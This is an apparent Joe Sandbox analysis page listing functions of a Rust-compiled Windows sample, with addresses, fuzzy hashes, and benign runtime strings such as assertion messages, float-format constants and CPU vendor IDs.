Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: ErrorLast$CaptureContextEntryEnvironmentFunctionLookupUnwindVariableVirtualmemset
String ID: RUST_LIB_BACKTRACERUST_BACKTRACEunsupported backtracedisabled backtrace
API String ID: 3171385808-4053888247
Opcode ID: 5cf352f9fbc5c34b7d2163354ef467015593991a35a7da61981eb83491243aa7
Instruction ID: 17797ff5a520db4f395566476c1438c03aa7ac11cbb9c35177fc6e71a7bac652
Opcode Fuzzy Hash: 5cf352f9fbc5c34b7d2163354ef467015593991a35a7da61981eb83491243aa7
Instruction Fuzzy Hash: F3F1A462A096D2C5F7718B60D8007FE2370ABA0758F444136EE4D9B799DF7CA566C30C

Function 00007FF66DFB2850 Relevance: 11.9, Strings: 9, Instructions: 643COMMON

Download Yara Rule

Strings

assertion failed: digits < 40assertion failed: other > 0, xrefs: 00007FF66DFB282F
assertion failed: edelta >= 0library\core\src\num\diy_float.rs, xrefs: 00007FF66DFB3E79
assertion failed: d.mant + d.plus < (1 << 61), xrefs: 00007FF66DFB3E61
d, xrefs: 00007FF66DFB39B6
assertion failed: d.mant > 0, xrefs: 00007FF66DFB262A, 00007FF66DFB359E, 00007FF66DFB3DE9
assertion failed: d.minus > 0, xrefs: 00007FF66DFB2642, 00007FF66DFB35B6, 00007FF66DFB3E01
assertion failed: d.plus > 0, xrefs: 00007FF66DFB265A, 00007FF66DFB35CE, 00007FF66DFB3E19
assertion failed: d.mant.checked_sub(d.minus).is_some(), xrefs: 00007FF66DFB268A, 00007FF66DFB35FE, 00007FF66DFB3E49
assertion failed: d.mant.checked_add(d.plus).is_some(), xrefs: 00007FF66DFB2672, 00007FF66DFB35E6, 00007FF66DFB3E31

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: assertion failed: d.mant + d.plus < (1 << 61)$assertion failed: d.mant > 0$assertion failed: d.mant.checked_add(d.plus).is_some()$assertion failed: d.mant.checked_sub(d.minus).is_some()$assertion failed: d.minus > 0$assertion failed: d.plus > 0$assertion failed: digits < 40assertion failed: other > 0$assertion failed: edelta >= 0library\core\src\num\diy_float.rs$d
API String ID: 0-4078518668
Opcode ID: 38772c9860d07e9ba59c0b18dd1c0c08319fe9f9ac6a3df7480cfaca08ebffdd
Instruction ID: ab432a62abf411e40be391ac1bc2f9de7988dfaaabb4359aa2a7daf582ad465d
Opcode Fuzzy Hash: 38772c9860d07e9ba59c0b18dd1c0c08319fe9f9ac6a3df7480cfaca08ebffdd
Instruction Fuzzy Hash: BD42EF62B14ACAC7EB14CF61A8407F827B5FB54788F549136EA0D9BBD9EE38D585C300

Function 00007FF66E084DEB Relevance: 6.6, Strings: 5, Instructions: 328COMMON

Download Yara Rule

Strings

assertion failed: self.value_lowered_uses[*result] == 0, xrefs: 00007FF66E084E81
assertion failed: has_lowering_side_effect(self.f, ir_inst), xrefs: 00007FF66E0852F1
assertion failed: self.cur_scan_entry_color.is_some(), xrefs: 00007FF66E085309
Instruction with amode should have memflags, xrefs: 00007FF66E085369
assertion failed: sunk_inst_exit_color == self.cur_scan_entry_color.unwrap(), xrefs: 00007FF66E085339

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: Instruction with amode should have memflags$assertion failed: has_lowering_side_effect(self.f, ir_inst)$assertion failed: self.cur_scan_entry_color.is_some()$assertion failed: self.value_lowered_uses[*result] == 0$assertion failed: sunk_inst_exit_color == self.cur_scan_entry_color.unwrap()
API String ID: 0-3697193702
Opcode ID: bc6f86d660f5f289b53ff9071708af56bf944f8745d967658b103bb51b795d35
Instruction ID: 90c741e82aeee193812d6b813e4a6f8a900e5f2e360fa37ffb3b33b62b58400a
Opcode Fuzzy Hash: bc6f86d660f5f289b53ff9071708af56bf944f8745d967658b103bb51b795d35
Instruction Fuzzy Hash: BAE1F362B08682D2EB54CF26D5403BA67B1FBA4B80F408035EE5E8B795DF3DE455CB04

Function 00007FF66E0B6D26 Relevance: 5.4, Strings: 4, Instructions: 442COMMON

Download Yara Rule

Strings

modnarod, xrefs: 00007FF66E0B707E
arenegyl, xrefs: 00007FF66E0B708B
uespemos, xrefs: 00007FF66E0B7071
setybdet, xrefs: 00007FF66E0B7098

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: arenegyl$modnarod$setybdet$uespemos
API String ID: 0-66988881
Opcode ID: b8a95bbf08b82cf016ca4e85f8596a9d168c95a7896e66de7ad28c796873687a
Instruction ID: 6094f4a4622b93dc28d1fb8f4bff7402eb2f6725ae407d21a3eea9d774895bcb
Opcode Fuzzy Hash: b8a95bbf08b82cf016ca4e85f8596a9d168c95a7896e66de7ad28c796873687a
Instruction Fuzzy Hash: 4312B222A18B81C2DA60CB25E4403AE7770FBA5B94F448632EF9D9BB95DF3DD591C304

Function 00007FF66DFB90B0 Relevance: 5.3, Strings: 4, Instructions: 331COMMON

Download Yara Rule

Strings

<, xrefs: 00007FF66DFB93A2
INF, xrefs: 00007FF66DFB91E1
INFINITY, xrefs: 00007FF66DFB9127
NAN, xrefs: 00007FF66DFB91E8

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: <$INF$INFINITY$NAN
API String ID: 0-3778457919
Opcode ID: 01b54da2ed3a0773c2d6bdb7f45125091ac0217669fc6bdaf991d66509b29ad7
Instruction ID: 1683536f8c683baceeab2ea089997bbf62f756450f2418ac100d3ba79dc73f81
Opcode Fuzzy Hash: 01b54da2ed3a0773c2d6bdb7f45125091ac0217669fc6bdaf991d66509b29ad7
Instruction Fuzzy Hash: F2D10662E0C687C5FB618A3598543BD67B6BF61394F548531DE0DEF2D6FE3CAA818200

Function 00007FF66E016BF0 Relevance: 5.1, APIs: 2, Strings: 1, Instructions: 645COMMON

Download Yara Rule

Strings

assertion failed: index <= len, xrefs: 00007FF66E017883

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: assertion failed: index <= len
API String ID: 0-2991906026
Opcode ID: 98878e9f1d6c6de173e95e550d25968dc4a56537940da66004d8df966a7130ff
Instruction ID: 69daeaa9244deda794bfc15ff925f298191cc99e81c91a8359aa1bef5e0a3cc4
Opcode Fuzzy Hash: 98878e9f1d6c6de173e95e550d25968dc4a56537940da66004d8df966a7130ff
Instruction Fuzzy Hash: E0729D76A18A86C1DA20CB95E4406EA7BB0FBD9B88F458032EF8D9B765DF3CD454C704

Function 00007FF66E0D6AF3 Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 252COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF66E0D6B22

Strings

$, xrefs: 00007FF66E0D6BED
punycode{, xrefs: 00007FF66E0D6DA0

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memset
String ID: $$punycode{
API String ID: 2221118986-3583469537
Opcode ID: fabd44f3b406659ff481968fd06ae94b77e196f2af04abdebe17e69a90515a6e
Instruction ID: e39dddedcb661ca12c53f83ae8dfb94170c1ffa212013a7bbdaf80fff29e3ff4
Opcode Fuzzy Hash: fabd44f3b406659ff481968fd06ae94b77e196f2af04abdebe17e69a90515a6e
Instruction Fuzzy Hash: B191E126B28A45C1EA64CB11F4443B977A5EBA9BC4F084032FE8D8B799DE3CE455C704

Function 00007FF66E0D4930 Relevance: 4.5, Strings: 3, Instructions: 724COMMON

Download Yara Rule

Strings

`fmt::Error`s should be impossible without a `fmt::Formatter`, xrefs: 00007FF66E0D541E
.llvm./user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/rustc-demangle-0.1.24/src/lib.rs, xrefs: 00007FF66E0D495E
__ZN, xrefs: 00007FF66E0D4D35

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcmp
String ID: .llvm./user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/rustc-demangle-0.1.24/src/lib.rs$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`
API String ID: 1475443563-1214091625
Opcode ID: 552e1ad3c8fdd89dd1b6a6706a2bf74b0b5342aaefd981679413ae7da0b0d30f
Instruction ID: bffa79312a50fa675ba6003098f2c323e4c044b4021894ee2d75508e867aa792
Opcode Fuzzy Hash: 552e1ad3c8fdd89dd1b6a6706a2bf74b0b5342aaefd981679413ae7da0b0d30f
Instruction Fuzzy Hash: BF52362AE185A2D5FB658B5094043BD2B72EB65368F444231FE6E8F6C4DF3CD966C308

Function 00007FF66DFACF22 Relevance: 4.1, Strings: 3, Instructions: 390COMMON

Download Yara Rule

Strings

{, xrefs: 00007FF66DFAD3F9
\u, xrefs: 00007FF66DFAD3FE
}, xrefs: 00007FF66DFAD389

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: \u${$}
API String ID: 0-1393841519
Opcode ID: b027a7e5dfa48e0861fe8f916bf3f0ff75c04569ad842a2f40a47e0c3d461f88
Instruction ID: 1589c0f9bb0b4d7401e0e36b48af150b17ab4ddcad741dca42bf4a67f2be25c5
Opcode Fuzzy Hash: b027a7e5dfa48e0861fe8f916bf3f0ff75c04569ad842a2f40a47e0c3d461f88
Instruction Fuzzy Hash: 81E13813A1C6D1C7E3258A29981067EAFB1E7DA740F088135EFDA8BB95EE3CD501DB14

Function 00007FF66DFB8A30 Relevance: 4.1, Strings: 3, Instructions: 337COMMON

Download Yara Rule

Strings

INFINITY, xrefs: 00007FF66DFB8AB6
NAN, xrefs: 00007FF66DFB8B3C
INF, xrefs: 00007FF66DFB8B35

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: INF$INFINITY$NAN
API String ID: 0-1478606128
Opcode ID: 29880fc97b88e28d92cd478af4fb663ad8c39e028079ba639fcf3f3cf4c62c50
Instruction ID: c722cc12d922e044c1fd31eca15afb410721bc00b7c8daa18b970d4a2079b925
Opcode Fuzzy Hash: 29880fc97b88e28d92cd478af4fb663ad8c39e028079ba639fcf3f3cf4c62c50
Instruction Fuzzy Hash: 0AD11562F08683C5FB658A65C8443B95772AFD8794F498632DE0DEF2C5FE3CB9808240

Function 00007FF66E106840 Relevance: 4.1, Strings: 3, Instructions: 304COMMON

Download Yara Rule

Strings

Authenti, xrefs: 00007FF66E106BD8
HygonGen, xrefs: 00007FF66E106BF7
GenuineI, xrefs: 00007FF66E106C2A

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: Authenti$GenuineI$HygonGen
API String ID: 0-696657513
Opcode ID: 38bd0842e0960c831964c41a1a55cf9730d189a0339f298647c0480d69f3d721
Instruction ID: 9fe8f9dfbe9ea84dbccfbe83768b4b1c14c9e2ad62bd4b3ca66cf3bb1aba13cc
Opcode Fuzzy Hash: 38bd0842e0960c831964c41a1a55cf9730d189a0339f298647c0480d69f3d721
Instruction Fuzzy Hash: 0C916AA3B3595546FB5C85A5AC32BB94892B3687C8F08A03DED5FDBBC4DC7CCA518240

Function 00007FF66E0D0850 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 590COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF66E0D0A6D

Strings

punycode{, xrefs: 00007FF66E0D0FD8

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memset
String ID: punycode{
API String ID: 2221118986-686464348
Opcode ID: 87db05023e9e394c1209a789ab43f632fa923bc66acba664bf755a20b1287cbd
Instruction ID: 0332dd13d37135f41f905cc2417e4c6a9cdc9b7aaa90f844d3cf5aaed1750f83
Opcode Fuzzy Hash: 87db05023e9e394c1209a789ab43f632fa923bc66acba664bf755a20b1287cbd
Instruction Fuzzy Hash: D822276AF0D786C5FB608B25D4443F867A6EB25B94F148131EE5D4BBC4EE3CA5628308

Function 00007FF66E264742 Relevance: 3.0, Strings: 2, Instructions: 539COMMON

Download Yara Rule

Strings

.eexportunresolved index in emission: , xrefs: 00007FF66E264E7B
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF66E265132

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: .eexportunresolved index in emission: $called `Result::unwrap()` on an `Err` value
API String ID: 0-1231597272
Opcode ID: c1009f6875e98d6361a8aed327a5e8f54da816031e0595c5774b7ce7f3c88e84
Instruction ID: 8d4ae5906bebd8c39745db56f6ca56bd564485710870e1a25418683498949812
Opcode Fuzzy Hash: c1009f6875e98d6361a8aed327a5e8f54da816031e0595c5774b7ce7f3c88e84
Instruction Fuzzy Hash: 91223962A0C642C2EA148B1396602B977B6BF657D8F544632FE8E8F7D5DE3CD542C304

Function 00007FF66E0C68F7 Relevance: 2.8, APIs: 2, Instructions: 266COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E0C69CF
memset.MSVCRT ref: 00007FF66E0C6A72

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: e91a09746a417af8bdcbdab9e2dd80ae183fa3a75d68153a0c92587c3297d703
Instruction ID: 3d461d92a9a45cb9bf6b1349bc8946716c4e16b11decc5ab1bff9039c06e7253
Opcode Fuzzy Hash: e91a09746a417af8bdcbdab9e2dd80ae183fa3a75d68153a0c92587c3297d703
Instruction Fuzzy Hash: 18A12362728B81C2EA208B19A41427AA361F7A5FE0F544735EFAE8B7C5DF3CD011C314

Function 00007FF66DFE700A Relevance: 2.6, Strings: 1, Instructions: 1313COMMON

Download Yara Rule

Strings

B, xrefs: 00007FF66DFE700A

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: B
API String ID: 0-1255198513
Opcode ID: 2b0eb72c81153b082d99fab378ca7a65e7da55b7abaaf9fbd9c3dd9d2099dab8
Instruction ID: e08dbed61f3cbf7f4ec715e6ca10561eb729ecc8999b6fcb316f09b99cf5c4c7
Opcode Fuzzy Hash: 2b0eb72c81153b082d99fab378ca7a65e7da55b7abaaf9fbd9c3dd9d2099dab8
Instruction Fuzzy Hash: E4C23166B08AD6C2EB20DA26D044BAE6B70FB85BD4F419031EE4D9B786EF7CD545C340

Function 00007FF66E02E974 Relevance: 1.9, Strings: 1, Instructions: 678COMMON

Download Yara Rule

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF66E02F5D2

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
